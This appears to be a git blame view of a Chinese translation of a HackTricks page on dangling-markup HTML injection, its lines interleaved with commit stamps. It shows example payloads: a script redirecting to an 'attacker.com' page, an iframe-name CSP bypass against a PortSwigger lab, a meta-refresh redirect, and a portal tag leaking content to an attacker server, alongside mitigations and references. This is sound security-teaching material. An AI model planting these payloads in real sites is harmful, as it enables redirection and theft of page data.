											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								这可以通过类似于：`sandbox=' allow-scripts allow-top-navigation'` 来缓解。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								iframe 也可以被滥用来泄露来自不同页面的敏感信息 **使用 iframe name 属性**。这是因为你可以创建一个 iframe，它自身嵌套 iframe，利用 HTML 注入使 **敏感信息出现在 iframe name 属性中**，然后从初始 iframe 访问该名称并泄露它。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								```html
 								<script>
 								function cspBypass(win) {
 								win[0].location = 'about:blank';
 								setTimeout(()=>alert(win[0].name), 500);
 								}
 								</script>
 								<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								### \<meta 滥用
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您可以使用 **`meta http-equiv`** 执行 **多个操作**，例如设置 Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向（在此情况下为 5 秒）: `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								这可以通过关于 **http-equiv** 的 **CSP** 来 **避免**（ `Content-Security-Policy: default-src 'self';`，或 `Content-Security-Policy: http-equiv 'self';`）
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								### 新的 \<portal HTML 标签
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您可以在 [这里](https://research.securitum.com/security-analysis-of-portal-element/) 找到关于 \<portal 标签可利用漏洞的非常 **有趣的研究**。\
 								在撰写本文时，您需要在 `chrome://flags/#enable-portals` 中启用 portal 标签，否则它将无法工作。
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<portal src='https://attacker-server?
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### HTML 泄漏
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								并非所有在 HTML 中泄漏连接的方式都对 Dangling Markup 有用，但有时它可能会有所帮助。请在这里查看： [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								## SS-Leaks
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								这是 **dangling markup 和 XS-Leaks** 的 **混合**。一方面，漏洞允许在 **同源** 的页面中 **注入 HTML**（但不包括 JS）。另一方面，我们不会直接 **攻击** 可以注入 HTML 的页面，而是 **另一个页面**。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								{% content-ref url="ss-leaks.md" %}
 								[ss-leaks.md](ss-leaks.md)
 								{% endcontent-ref %}
 								## XS-Search/XS-Leaks
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								XS-Search 旨在 **提取跨源信息**，利用 **侧信道攻击**。因此，这是一种不同于 Dangling Markup 的技术，然而，一些技术利用了 HTML 标签的包含（有和没有 JS 执行），如 [**CSS Injection**](../xs-search/#css-injection) 或 [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								{% content-ref url="../xs-search/" %}
 								[xs-search](../xs-search/)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								{% endcontent-ref %}
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								## 暴力破解检测列表
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								## 参考文献
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								* [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
 								* [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
 								* [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/)
 								* [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								{% hint style="success" %}
 								学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								学习与实践 GCP 黑客技术： <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								<details>
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								<summary>支持 HackTricks</summary>
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								{% endhint %}